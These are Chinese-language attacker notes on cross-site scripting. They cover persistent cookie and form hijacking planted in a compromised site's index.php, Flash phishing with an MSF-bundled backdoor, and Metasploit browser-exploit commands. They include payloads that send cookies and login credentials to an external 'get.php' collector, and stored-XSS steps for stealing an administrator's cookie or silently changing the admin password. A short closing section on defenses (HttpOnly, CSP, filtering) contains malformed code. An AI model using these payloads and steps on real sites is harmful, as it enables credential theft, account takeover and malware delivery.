XSS(跨站脚本攻击)Cross-Site Scripting

利用攻击:
–条件:已经取得web权限
一、XSS-后台植入Cookie表单劫持
1、写入代码到登陆成功文件,利用beef或xss平台实时监控cookie等凭据实现权限维持
2、若存在同源策略或防护情况下,cookie获取失败可采用表单劫持或数据明文传输实现

(后台植入)—–对后台长期控制:在取得web权限后,插入恶意代码在index.php中
每次登录成功,获取cookie
登录抓包直接修改cookie

《1》cookie劫持无效,可以简单表单劫持
==》1、在登录页面写入监听劫持代码

$up=’<script src = http://xxxxx/get.php?user='xxx'&pass='xxx'>
echo $up;
《2》==》2、接收地址中写入接收文件

二、xss-flash 钓鱼配合 MSF捆绑上线

==》针对个人客户端
1、msf生成后门文件
2、下载官方文件
3、捆绑压缩,高级自定义,解压前运行后门文件
4、搭建钓鱼网站
5、诱导目标访问URL

三、xss-浏览器网页木马配合MSF访问上线
条件:beef上线受控制后直接钓鱼(浏览器存在0day漏洞)
==》针对浏览器

攻击目标win xp 和 win 7
1、配置MSF生成URL
use exploit/windows/browser/ms14_064_ole_code_execution
set allowpowershellprompt true
set target 1
run
2、诱导访问目标URL


服务器准备接收cookie文件

js: document.cookie

存在script过滤

使用<img src=1 onerro=window.location.href=’http://xxx/get.php?a=‘ + document.cookie; >

服务端接收数据文件:

存储型:
1、注册用户,写入xss《script》代码获取管理员cookie,管理员访问用户管理页面,自动提交cookie
2、自动修改密码:
注册用户写script代码修改管理员密码
管理员访问用户管理,自动修改管理员密码

获取到cookie但是无法使用,失效时间快
可以使用js 代码直接获取用户信息

xss防御
—xss修复

1、进行字符过滤,过滤敏感字符
ini_setting
2、开启session.cookie_httponly 设置为1
session.cookie_httponly=1
ini_set(“session.cookie_httponly”,1);

3、csp策略
设置CSP(Content Securitu Policy)
header(“Content.Security.policy.img.src”self” “);

4、输入长度限制

=====》进行攻防演示